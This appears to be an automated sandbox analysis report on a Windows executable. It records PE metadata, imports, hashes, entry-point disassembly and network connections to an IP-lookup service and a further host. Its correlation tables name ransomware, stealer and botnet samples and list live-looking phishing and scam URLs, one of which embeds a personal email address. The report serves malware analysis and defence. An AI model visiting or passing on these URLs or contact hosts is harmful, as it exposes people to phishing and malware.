HCA Information:	Successful, ratio: 98% Number of executed functions: 15 Number of non-executed functions: 162
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: jgbC220X2U.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	xKvkNk9SXR.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	GD8c7ARn8q.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	8AbMCL2dxM.exe	Get hash	malicious	RCRU64, TrojanRansom	Browse	api.ipify.org/
	Simple2.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Ransomware Mallox.exe	Get hash	malicious	Targeted Ransomware	Browse	api.ipify.org/
	Yc9hcFC1ux.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	6706e721f2c06.exe	Get hash	malicious	Remcos	Browse	api.ipify.org/
	perfcc.elf	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
172.67.74.152	malware.exe	Get hash	malicious	Targeted Ransomware, TrojanRansom	Browse	api.ipify.org/
	Simple1.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Simple2.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	systemConfigChecker.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	systemConfigChecker.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Zc9eO57fgF.elf	Get hash	malicious	Unknown	Browse	api.ipify.org/
	67065b4c84713_Javiles.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Yc9hcFC1ux.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	4F08j2Rmd9.bin	Get hash	malicious	Xmrig	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	QUOTATION#08670.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	INVOICE NO. USF23-24072 IGR23110.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	SPECIFICATIONS.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	EEMsLiXoiTzoaDd.scr	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	Statement 2024-11-29 (K07234).exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	Employee_Letter.pdf	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
	1mr7lpFIVI.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	jKDBppzWTb.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	enyi.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	proforma invoice.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	nicegirlforyou.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67
	nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67
	invoice09850.xls	Get hash	malicious	Remcos	Browse	188.114.96.6
	Reqt 83291.vbs	Get hash	malicious	Remcos, GuLoader	Browse	104.21.86.72
	EBUdultKh7.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.78.149
	https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.uk	Get hash	malicious	HTMLPhisher	Browse	104.18.41.169
	https://renemattner.simvoly.com/?preview=__PREVIEW_ONLY&c=E,1,Ks6Sg62CfOE_CkRSGsjWzEZqQJ4kslHIx5N9ygK8IrTT7dwyHfXwvE4VbQEnQwQXPVvQMpZGcaIV_fVQbP7vMcdrXBRSSDaH5Z18aBsWUw,,&typo=1	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	Nieuwebestellingen10122024.exe	Get hash	malicious	FormBook	Browse	172.64.41.3
	https://smialex.id/Frbleuelsas	Get hash	malicious	Anonymous Proxy	Browse	104.21.37.221
	https://smialex.id/Frbleuelsas	Get hash	malicious	Anonymous Proxy	Browse	172.67.213.233
DIGITALOCEAN-ASNUS	https://hongkongliving.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	159.89.194.120
	http://prntbl.concejomunicipaldechinu.gov.co	Get hash	malicious	Unknown	Browse	167.172.148.114
	Josho.arm.elf	Get hash	malicious	Unknown	Browse	157.230.180.175
	hax.arm.elf	Get hash	malicious	Mirai	Browse	45.55.195.236
	http://abercombie.com	Get hash	malicious	Unknown	Browse	104.248.224.96
	https://listafrica.org/Receipt.html	Get hash	malicious	WinSearchAbuse	Browse	68.183.112.81
	https://t.ly/8cSDx	Get hash	malicious	Unknown	Browse	188.166.17.21
	Forhandlingsfriheden.exe	Get hash	malicious	FormBook, GuLoader	Browse	165.22.38.185
	http://email.edms.trackingmore.com/c/eJx0zrFuhDAMgOGnCWPE2YHAkKELr4FsxwF05EBJWun69JU6den8D_8XQz88mKXT8PCICDi6udsDJB44oUuePHiZGCABe0UvMAlP3RGGSSHOI4w--d7NiUdBAlQPKglkNq7Pb9sKyfN4bfkqauXK3Rn21m6DHwYWA0usZKlGu50X03lT2-tOJ1mNn_Z1G1hK7PJ7zVorbboe8Y9z_T7kWS7W0tD1xvVbpuP8vZTwf_sK8BMAAP__3p9Nvw#4UjjVf19156dXgi477henjyiztuh1607QELNKWKBNFUHFFI32RLCJ32096s9/84502vqz	Get hash	malicious	Phisher	Browse	159.65.226.43
	la.bot.powerpc.elf	Get hash	malicious	Mirai	Browse	188.166.27.224
CLOUDFLARENETUS	nicegirlforyou.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67
	nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67
	invoice09850.xls	Get hash	malicious	Remcos	Browse	188.114.96.6
	Reqt 83291.vbs	Get hash	malicious	Remcos, GuLoader	Browse	104.21.86.72
	EBUdultKh7.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.78.149
	https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.uk	Get hash	malicious	HTMLPhisher	Browse	104.18.41.169
	https://renemattner.simvoly.com/?preview=__PREVIEW_ONLY&c=E,1,Ks6Sg62CfOE_CkRSGsjWzEZqQJ4kslHIx5N9ygK8IrTT7dwyHfXwvE4VbQEnQwQXPVvQMpZGcaIV_fVQbP7vMcdrXBRSSDaH5Z18aBsWUw,,&typo=1	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	Nieuwebestellingen10122024.exe	Get hash	malicious	FormBook	Browse	172.64.41.3
	https://smialex.id/Frbleuelsas	Get hash	malicious	Anonymous Proxy	Browse	104.21.37.221
	https://smialex.id/Frbleuelsas	Get hash	malicious	Anonymous Proxy	Browse	172.67.213.233

Process:	C:\Users\user\Desktop\jgbC220X2U.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	336
Entropy (8bit):	3.7406015629507228
Encrypted:	false
SSDEEP:	6:UoLF3oLF3oLF3oLF3oLF3oLF3oLF3oLF3oLF3oLF3oLF3oLF3oLF3oLFy:NFmFmFmFmFmFmFmFmFmFmFmFmFmFy
MD5:	13D131A6EDC53FE2FDADC4EA0203A08A
SHA1:	30F818ED02C33FB137D0F8B419B6538BBAEEE14B
SHA-256:	92185235AF3FBCF3F0157EFBDAAA9834B3A27CA66A4A00B1552F15448C21BAA3
SHA-512:	CF5DA223E39E7F85CBF6CA5D6C0DE04B12B9B51AA01A2555BDBCC83F021CE489915040518D4E7C2648C2E1300EF8547F329FA8721A24FD1739DB0ED75DD8E99F
Malicious:	false
Reputation:	low
Preview:	Failed to send status...Failed to send status...Failed to send status...Failed to send status...Failed to send status...Failed to send status...Failed to send status...Failed to send status...Failed to send status...Failed to send status...Failed to send status...Failed to send status...Failed to send status...Failed to send status...

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	5.889389316114988
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	jgbC220X2U.exe
File size:	7'131'898 bytes
MD5:	28354f3e0d66d054bf0d05c3caf1e28a
SHA1:	612fa801d24607511387c8e051bd6de9e0d26b9e
SHA256:	f88fa3aa1dc3a59d1914254917c835783d84d384675f3622dde5aa7893952c96
SHA512:	a15e48bd8be9f74a98d6bb3cce4b2b55625629ea972fdd9a05179f5a6c6957b3bfa90883e6427cc66171fef49837912a58d230ac03c7aecd2b5c31775db2bb15
SSDEEP:	98304:pUkIJaHXWPAfyCdpj6tDW47zhOBJkb9aiieIaH8CRwd9uzhOY2o3QwBSHsg5t61F:ikIRR5h6HE1rL5LGfvt2
TLSH:	E576D9A715AB5CE5EAC673BCB5C7623D9B34FC22CD69192F9204C435AC832847D2EB41
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......g.........&.....h...\|......%..........@.....................................Um...`... ............................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x140001125
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x670D7FE8 [Mon Oct 14 20:32:40 2024 UTC]
TLS Callbacks:	0x4000bfe0, 0x1, 0x4000c0a0, 0x1, 0x4001b54e, 0x1
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ef8b3b70a03909079864c2140721ce14

Entrypoint Preview

Instruction
push ebp
dec eax
mov ebp, esp
dec eax
sub esp, 30h
mov dword ptr [ebp-04h], 000000FFh
dec eax
mov eax, dword ptr [001545B5h]
mov dword ptr [eax], 00000000h
call 00007F412122A703h
mov dword ptr [ebp-04h], eax
nop
nop
mov eax, dword ptr [ebp-04h]
dec eax
add esp, 30h
pop ebp
ret
push ebp
dec eax
mov ebp, esp
dec eax
sub esp, 70h
dec eax
mov dword ptr [ebp-10h], 00000000h
mov dword ptr [ebp-1Ch], 00000030h
mov eax, dword ptr [ebp-1Ch]
dec eax
mov eax, dword ptr [eax]
dec eax
mov dword ptr [ebp-28h], eax
dec eax
mov eax, dword ptr [ebp-28h]
dec eax
mov eax, dword ptr [eax+08h]
dec eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-04h], 00000000h
jmp 00007F412122A713h
dec eax
mov eax, dword ptr [ebp-10h]
dec eax
cmp eax, dword ptr [ebp-18h]
jne 00007F412122A6FBh
mov dword ptr [ebp-04h], 00000001h
jmp 00007F412122A737h
mov ecx, 000003E8h
dec eax
mov eax, dword ptr [001A8746h]
call eax
dec eax
mov eax, dword ptr [0015459Dh]
dec eax
mov dword ptr [ebp-30h], eax
dec eax
mov eax, dword ptr [ebp-18h]
dec eax
mov dword ptr [ebp-38h], eax
dec eax
mov dword ptr [ebp-40h], 00000000h
dec eax
mov ecx, dword ptr [ebp-38h]
dec eax
mov eax, dword ptr [ebp-40h]
dec eax
mov edx, dword ptr [ebp-30h]
dec eax
cmpxchg dword ptr [edx], ecx
dec eax
mov dword ptr [ebp-10h], eax
dec eax
cmp dword ptr [ebp-10h], 00000000h
jne 00007F412122A69Ah
dec eax
mov eax, dword ptr [00154576h]
mov eax, dword ptr [eax]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1a9000	0x1d50	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x16a000	0x1a8d4	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1ad000	0x1d68	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x153f20	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1a9768	0x638	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x146700	0x146800	77349d5ce0842838be283c444b1e7fa0	False	0.31570037327718226	data	6.011577155215405	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x148000	0x4ca0	0x4e00	1a246a5035db48224f189597fa5571ea	False	0.031600560897435896	data	0.5703995935155458	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x14d000	0x1b260	0x1b400	61af7993cdd0dd079eb666aeac4897be	False	0.20101956708715596	data	5.289366783312055	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
/4	0x169000	0x4	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x16a000	0x1a8d4	0x1aa00	32a19f1d5eaa9f8d6018332c3953aaa4	False	0.5223921654929577	data	6.170793177437251	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata	0x185000	0x2245c	0x22600	8daf71ea83cefd59f84d26a67bd78028	False	0.17060369318181817	shared library	4.76992069970833	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x1a8000	0xd80	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x1a9000	0x1d50	0x1e00	85c7fb81abf5152ee91f00c23d90fe4a	False	0.3067708333333333	data	4.470422394573293	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x1ab000	0x68	0x200	b9b680875ff1ac6dc2d841039d9c0882	False	0.076171875	data	0.37020935604047256	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x1ac000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x1ad000	0x1d68	0x1e00	f6f4e4b1783d86a4ba1b2e0d407ad73d	False	0.35208333333333336	data	5.429210425100174	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/14	0x1af000	0xd0	0x200	4c5ccc9a8c7e1f50c9332e402fcdd6e6	False	0.154296875	data	0.8135941418709078	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/29	0x1b0000	0x46f9	0x4800	8a70cdea438dd463d8d169b649d5cef3	False	0.3792860243055556	Matlab v4 mat-file (little endian) @\001, rows 134283269, columns 0, imaginary	5.830938126363056	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/41	0x1b5000	0x8a5	0xa00	8c412e1ec809bc2d22840ac0c0dd9436	False	0.326953125	data	4.517567710861818	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/55	0x1b6000	0x97f	0xa00	93edfdff4dd5e8ebd761fe7a54efc881	False	0.540625	data	4.789641841730167	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/67	0x1b7000	0x498	0x600	94009fe3acab9a4989e90d3e57374634	False	0.3444010416666667	data	3.151620531573487	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/80	0x1b8000	0xce	0x200	292217cd9caa0647d900f44faf753dd5	False	0.34375	data	2.8722615854557496	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/91	0x1b9000	0x461	0x600	75a450f8317627827fe1cca60ebb0ae6	False	0.181640625	data	4.17072784657899	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/107	0x1ba000	0x88b	0xa00	fd46d698c19f66b45ec30d6988f5b6d4	False	0.398828125	data	4.021570199541239	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/123	0x1bb000	0x108	0x200	06fb2fd98c2a2dd2828869db38f7cb4e	False	0.294921875	data	2.3510720891965007	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	AddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateFileMappingW, CreateFileW, CreateSemaphoreA, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, FormatMessageA, FreeLibrary, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetFileSizeEx, GetHandleInformation, GetLastError, GetModuleHandleA, GetProcAddress, GetProcessAffinityMask, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetTickCount64, InitializeCriticalSection, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryA, LocalFree, MapViewOfFile, MultiByteToWideChar, OpenProcess, OutputDebugStringA, RaiseException, ReleaseSemaphore, RemoveVectoredExceptionHandler, ResetEvent, ResumeThread, RtlCaptureContext, RtlLookupFunctionEntry, RtlUnwindEx, RtlVirtualUnwind, SetEvent, SetLastError, SetProcessAffinityMask, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, Sleep, SuspendThread, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, UnmapViewOfFile, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WideCharToMultiByte
api-ms-win-crt-convert-l1-1-0.dll	_ultoa, mbrtowc, strtol, strtoll, strtoul, strtoull, wcrtomb
api-ms-win-crt-environment-l1-1-0.dll	__p__environ, __p__wenviron, getenv
api-ms-win-crt-filesystem-l1-1-0.dll	_fstat64, _stat64
api-ms-win-crt-heap-l1-1-0.dll	_set_new_mode, calloc, free, malloc, realloc
api-ms-win-crt-locale-l1-1-0.dll	___lc_codepage_func, ___mb_cur_max_func, localeconv, setlocale
api-ms-win-crt-math-l1-1-0.dll	__setusermatherr, _fdopen
api-ms-win-crt-private-l1-1-0.dll	__C_specific_handler, __intrinsic_setjmpex, longjmp, memchr, memcmp, memcpy, memmove, strchr
api-ms-win-crt-runtime-l1-1-0.dll	__p___argc, __p___argv, __p___wargv, _assert, _beginthreadex, _cexit, _configure_narrow_argv, _configure_wide_argv, _crt_at_quick_exit, _crt_atexit, _endthreadex, _errno, _exit, _initialize_narrow_environment, _initialize_wide_environment, _initterm, _set_app_type, _set_invalid_parameter_handler, abort, exit, signal, strerror, system
api-ms-win-crt-stdio-l1-1-0.dll	__acrt_iob_func, __p__commode, __p__fmode, __stdio_common_vfprintf, __stdio_common_vfwprintf, __stdio_common_vsprintf, __stdio_common_vswprintf, _fileno, _fseeki64, _ftelli64, _lseeki64, _read, _wfopen, _write, fclose, fflush, fgetwc, fopen, fputc, fputs, fread, fwrite, getc, getwc, putc, putwc, setvbuf, ungetc, ungetwc
api-ms-win-crt-string-l1-1-0.dll	_strdup, iswctype, memset, strcmp, strcoll, strlen, strncmp, strxfrm, towlower, towupper, wcscoll, wcslen, wcsxfrm
api-ms-win-crt-time-l1-1-0.dll	__daylight, __timezone, __tzname, _tzset, strftime, wcsftime
api-ms-win-crt-utility-l1-1-0.dll	rand_s
WS2_32.dll	WSACleanup, WSAGetLastError, WSASocketW, WSAStartup, __WSAFDIsSet, closesocket, connect, freeaddrinfo, getaddrinfo, getnameinfo, getpeername, getsockname, getsockopt, ioctlsocket, ntohs, recv, select, send, setsockopt, shutdown, socket

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 11, 2024 11:28:58.618937016 CET	49704	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:28:58.742666960 CET	80	49704	172.67.74.152	192.168.2.5
Dec 11, 2024 11:28:58.742782116 CET	49704	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:28:58.776192904 CET	49704	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:28:58.898510933 CET	80	49704	172.67.74.152	192.168.2.5
Dec 11, 2024 11:28:59.841166019 CET	80	49704	172.67.74.152	192.168.2.5
Dec 11, 2024 11:28:59.841892958 CET	49704	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:28:59.841926098 CET	80	49704	172.67.74.152	192.168.2.5
Dec 11, 2024 11:28:59.842000961 CET	49704	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:28:59.964108944 CET	80	49704	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:00.476305008 CET	49705	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:00.599672079 CET	80	49705	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:00.599808931 CET	49705	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:00.612281084 CET	49705	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:00.735930920 CET	80	49705	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:00.735989094 CET	49705	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:00.860642910 CET	80	49705	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:01.844504118 CET	80	49705	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:01.844525099 CET	80	49705	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:01.844536066 CET	80	49705	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:01.844670057 CET	49705	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:01.844922066 CET	49705	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:01.862426043 CET	49706	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:01.970168114 CET	80	49705	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:01.987384081 CET	80	49706	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:01.987464905 CET	49706	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:01.987719059 CET	49706	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:02.111521006 CET	80	49706	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:03.231303930 CET	80	49706	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:03.231328011 CET	80	49706	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:03.231349945 CET	80	49706	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:03.231373072 CET	49706	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:03.231414080 CET	49706	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:03.232486963 CET	49706	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:03.357249975 CET	80	49706	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:08.222858906 CET	49707	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:08.346604109 CET	80	49707	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:08.346791029 CET	49707	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:08.347069979 CET	49707	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:08.467957973 CET	80	49707	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:09.444174051 CET	80	49707	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:09.444520950 CET	80	49707	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:09.444525957 CET	49707	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:09.444575071 CET	49707	80	192.168.2.5	172.67.74.152
Dec 11, 2024 11:29:09.445609093 CET	49708	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:09.565968990 CET	80	49707	172.67.74.152	192.168.2.5
Dec 11, 2024 11:29:09.565984964 CET	80	49708	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:09.566185951 CET	49708	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:09.566456079 CET	49708	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:09.686184883 CET	80	49708	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:09.686248064 CET	49708	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:09.805650949 CET	80	49708	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:10.803586960 CET	80	49708	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:10.803620100 CET	80	49708	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:10.803632975 CET	80	49708	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:10.803716898 CET	49708	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:10.803757906 CET	49708	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:10.804024935 CET	49708	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:10.805242062 CET	49709	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:10.923233986 CET	80	49708	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:10.924577951 CET	80	49709	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:10.924681902 CET	49709	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:10.940543890 CET	49709	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:11.060894012 CET	80	49709	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:12.177777052 CET	80	49709	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:12.177824020 CET	80	49709	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:12.177912951 CET	49709	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:12.179074049 CET	80	49709	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:12.179132938 CET	49709	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:12.179236889 CET	49709	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:29:12.298531055 CET	80	49709	167.99.38.229	192.168.2.5
Dec 11, 2024 11:29:17.191245079 CET	49714	80	192.168.2.5	172.67.74.152
